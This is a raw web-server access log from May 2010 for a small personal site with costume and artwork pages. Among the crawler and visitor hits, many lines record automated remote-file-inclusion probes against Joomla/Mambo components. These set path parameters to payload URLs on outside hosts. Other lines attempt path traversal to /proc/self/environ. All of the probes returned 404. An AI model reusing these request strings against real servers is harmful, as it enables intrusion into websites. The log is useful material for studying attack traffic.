216.131.91.180 - - [01/May/2010:02:14:02 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:14:02 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:14:03 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:14:03 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:14:04 -0500] "GET /logs/access_log.1263945600/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:14:08 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:14:10 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:14:10 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.195.112.180 - - [01/May/2010:02:14:12 -0500] "GET /logs/access_log.1173139200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
210.245.85.109 - - [01/May/2010:02:14:29 -0500] "GET /index0.php?show=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:02:14:29 -0500] "GET /logs/access_log.1263254400/index0.php?show=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:02:14:29 -0500] "GET /logs/index0.php?show=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:02:14:29 -0500] "GET /logs/access_log.1266278400/index0.php?show=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.115.111.248 - - [01/May/2010:02:15:16 -0500] "GET /logs/access_log.1223596800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/May/2010:02:15:18 -0500] "GET /logs/access_log.1227830400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/May/2010:02:15:20 -0500] "GET /logs/access_log.1237766400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/May/2010:02:15:23 -0500] "GET /logs/access_log.1253491200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
216.105.40.177 - - [01/May/2010:02:17:39 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""WebRingChecker/1.71 LWP/5.79"
207.46.199.179 - - [01/May/2010:02:20:05 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.14.193.67 - - [01/May/2010:02:27:40 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Wireless Transcoder) Version/3.1 Safari/525.13"
72.14.193.67 - - [01/May/2010:02:27:40 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Wireless Transcoder) Version/3.1 Safari/525.13,Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Wireless Transcoder) Version/3.1 Safari/525.13"
72.14.193.67 - - [01/May/2010:02:27:40 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Wireless Transcoder) Version/3.1 Safari/525.13,Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Wireless Transcoder) Version/3.1 Safari/525.13"
72.14.193.67 - - [01/May/2010:02:27:41 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Wireless Transcoder) Version/3.1 Safari/525.13,Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Wireless Transcoder) Version/3.1 Safari/525.13"
41.220.75.19 - - [01/May/2010:02:28:01 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://www.google.com/m/search?client=ms-sonyericsson&channel=bm&hl=en&sa=2&q=Costumes+of+all+nation&site=universal""SonyEricssonW880i/R1JC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
41.220.75.19 - - [01/May/2010:02:28:10 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""SonyEricssonW880i/R1JC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
41.220.75.19 - - [01/May/2010:02:28:12 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""SonyEricssonW880i/R1JC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
41.220.75.19 - - [01/May/2010:02:28:13 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""SonyEricssonW880i/R1JC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
41.220.75.19 - - [01/May/2010:02:28:13 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""SonyEricssonW880i/R1JC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
92.241.190.214 - - [01/May/2010:02:28:24 -0500] "GET //common/db.php?commonpath=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
92.241.190.214 - - [01/May/2010:02:28:24 -0500] "GET /logs/access_log.1270684800//common/db.php?commonpath=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
92.241.190.214 - - [01/May/2010:02:28:24 -0500] "GET /logs//common/db.php?commonpath=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 303 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
41.220.75.19 - - [01/May/2010:02:28:45 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""SonyEricssonW880i/R1JC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
41.220.75.19 - - [01/May/2010:02:29:07 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "http://tomdolan.pconline.com/costume/costume2.htm""SonyEricssonW880i/R1JC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
41.220.75.19 - - [01/May/2010:02:29:10 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.1" 200 46065 "http://tomdolan.pconline.com/costume/thmb1.htm""SonyEricssonW880i/R1JC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
41.220.75.19 - - [01/May/2010:02:29:11 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.1" 200 44353 "http://tomdolan.pconline.com/costume/thmb1.htm""SonyEricssonW880i/R1JC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
41.220.75.19 - - [01/May/2010:02:29:11 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.1" 200 44129 "http://tomdolan.pconline.com/costume/thmb1.htm""SonyEricssonW880i/R1JC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
41.220.75.19 - - [01/May/2010:02:29:11 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.1" 200 50590 "http://tomdolan.pconline.com/costume/thmb1.htm""SonyEricssonW880i/R1JC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
41.220.75.19 - - [01/May/2010:02:29:49 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.1" 200 44973 "http://tomdolan.pconline.com/costume/thmb1.htm""SonyEricssonW880i/R1JC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
41.220.75.19 - - [01/May/2010:02:29:51 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.1" 200 49320 "http://tomdolan.pconline.com/costume/thmb1.htm""SonyEricssonW880i/R1JC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
41.220.75.19 - - [01/May/2010:02:29:52 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.1" 200 43100 "http://tomdolan.pconline.com/costume/thmb1.htm""SonyEricssonW880i/R1JC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
41.220.75.19 - - [01/May/2010:02:29:58 -0500] "GET /costume/008_JPG%20copy.jpg HTTP/1.1" 200 43767 "http://tomdolan.pconline.com/costume/thmb1.htm""SonyEricssonW880i/R1JC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
41.220.75.19 - - [01/May/2010:02:29:58 -0500] "GET /costume/009_JPG%20copy.jpg HTTP/1.1" 200 47583 "http://tomdolan.pconline.com/costume/thmb1.htm""SonyEricssonW880i/R1JC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
41.220.75.19 - - [01/May/2010:02:30:00 -0500] "GET /costume/010_jpg%20copy.jpg HTTP/1.1" 200 47369 "http://tomdolan.pconline.com/costume/thmb1.htm""SonyEricssonW880i/R1JC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
41.220.75.19 - - [01/May/2010:02:30:11 -0500] "GET /costume/011_JPG%20copy.jpg HTTP/1.1" 200 46554 "http://tomdolan.pconline.com/costume/thmb1.htm""SonyEricssonW880i/R1JC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
41.220.75.19 - - [01/May/2010:02:30:14 -0500] "GET /costume/012_JPG%20copy.jpg HTTP/1.1" 200 43366 "http://tomdolan.pconline.com/costume/thmb1.htm""SonyEricssonW880i/R1JC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
216.131.91.180 - - [01/May/2010:02:30:24 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:30:24 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:30:24 -0500] "GET /logs/access_log.1270857600%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
41.220.75.19 - - [01/May/2010:02:30:31 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/costume1.htm""SonyEricssonW880i/R1JC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
41.220.75.19 - - [01/May/2010:02:30:31 -0500] "GET /costume/enter1.gif HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/costume1.htm""SonyEricssonW880i/R1JC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
41.220.75.19 - - [01/May/2010:02:30:35 -0500] "GET /costume/ HTTP/1.1" 200 - "http://www.google.com/m/search?client=ms-sonyericsson&channel=bm&hl=en&sa=2&q=Costumes+of+all+nation&site=universal""SonyEricssonW880i/R1JC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
216.131.91.180 - - [01/May/2010:02:30:48 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:30:48 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:30:50 -0500] "GET /logs/access_log.1270857600%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:31:25 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:31:25 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:31:25 -0500] "GET /logs/access_log.1270857600%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:31:35 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:31:35 -0500] "GET /logs/access_log.1270857600%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:31:38 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:02:32:53 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:02:32:53 -0500] "GET /logs/access_log.1219708800%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:02:32:53 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:02:32:53 -0500] "GET /logs/access_log.1219708800%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:02:32:53 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:02:32:53 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:02:34:08 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:02:34:08 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
78.110.50.139 - - [01/May/2010:02:34:08 -0500] "GET /logs/access_log.1268611200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
87.250.255.243 - - [01/May/2010:02:43:05 -0500] "GET /artwork/furniture.htm HTTP/1.1" 200 1004 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.244 - - [01/May/2010:02:46:25 -0500] "GET /logs/access_log.1228348800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.71.36 - - [01/May/2010:02:46:32 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.195.112.180 - - [01/May/2010:02:47:04 -0500] "GET /logs/access_log.1238976000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.70.136.22 - - [01/May/2010:02:47:53 -0500] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.kesehatanibu.depkes.go.id/xmlrpc/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
67.195.112.180 - - [01/May/2010:02:49:43 -0500] "GET /logs/access_log.1221955200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.70.136.22 - - [01/May/2010:02:54:28 -0500] "GET /logs/access_log.1270857600//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.kesehatanibu.depkes.go.id/xmlrpc/id.txt?? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
202.70.136.22 - - [01/May/2010:02:54:30 -0500] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.kesehatanibu.depkes.go.id/xmlrpc/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
202.70.136.22 - - [01/May/2010:02:54:31 -0500] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.kesehatanibu.depkes.go.id/xmlrpc/id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
212.175.146.45 - - [01/May/2010:02:57:17 -0500] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.76"
212.175.146.45 - - [01/May/2010:02:57:18 -0500] "GET /errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
218.38.34.19 - - [01/May/2010:02:58:59 -0500] "GET /logs/setup.php?write[use_category]=1&dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.38.34.19 - - [01/May/2010:02:58:59 -0500] "GET /logs/access_log.1264550400/setup.php?write[use_category]=1&dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.34.19 - - [01/May/2010:02:58:59 -0500] "GET /setup.php?write[use_category]=1&dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
202.70.136.22 - - [01/May/2010:02:59:59 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.kesehatanibu.depkes.go.id/xmlrpc/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
125.251.103.3 - - [01/May/2010:03:06:02 -0500] "GET /http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.65"
81.80.122.44 - - [01/May/2010:03:07:24 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
81.80.122.44 - - [01/May/2010:03:07:31 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
81.80.122.44 - - [01/May/2010:03:07:52 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
81.80.122.44 - - [01/May/2010:03:08:04 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
207.46.195.241 - - [01/May/2010:03:10:25 -0500] "GET /artwork/menorahs.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [01/May/2010:03:12:36 -0500] "GET /artwork/whirligigs.htm HTTP/1.1" 200 985 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.46.190.110 - - [01/May/2010:03:12:41 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
174.46.190.110 - - [01/May/2010:03:12:42 -0500] "GET /logs/access_log.1270598400%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
174.46.190.110 - - [01/May/2010:03:12:46 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
174.46.190.110 - - [01/May/2010:03:12:46 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
174.46.190.110 - - [01/May/2010:03:12:46 -0500] "GET /logs/access_log.1270598400//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
174.46.190.110 - - [01/May/2010:03:12:47 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.190.102.21 - - [01/May/2010:03:14:06 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
121.190.102.21 - - [01/May/2010:03:14:06 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
121.190.102.21 - - [01/May/2010:03:14:06 -0500] "GET /logs/access_log.1264809600/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
121.190.102.21 - - [01/May/2010:03:14:06 -0500] "GET /logs/access_log.1266364800/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
184.73.61.159 - - [01/May/2010:03:14:13 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.61.159 - - [01/May/2010:03:14:13 -0500] "GET /logs/access_log.1270598400 HTTP/1.1" 200 32768 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
174.46.190.110 - - [01/May/2010:03:15:56 -0500] "GET /logs/access_log.1229212800//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
207.46.199.54 - - [01/May/2010:03:18:25 -0500] "GET /logs/access_log.1196812800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.190.102.21 - - [01/May/2010:03:22:01 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
121.190.102.21 - - [01/May/2010:03:22:01 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
121.190.102.21 - - [01/May/2010:03:22:01 -0500] "GET /logs/access_log.1264809600/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
121.190.102.21 - - [01/May/2010:03:22:12 -0500] "GET /logs/access_log.1266364800/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:03:22:18 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:03:22:18 -0500] "GET /logs/access_log.1268611200%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/id1.txt?? HTTP/1.1" 404 389 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:03:22:18 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:03:22:35 -0500] "GET /logs/access_log.1219708800%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/id1.txt?? HTTP/1.1" 404 389 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:03:22:41 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
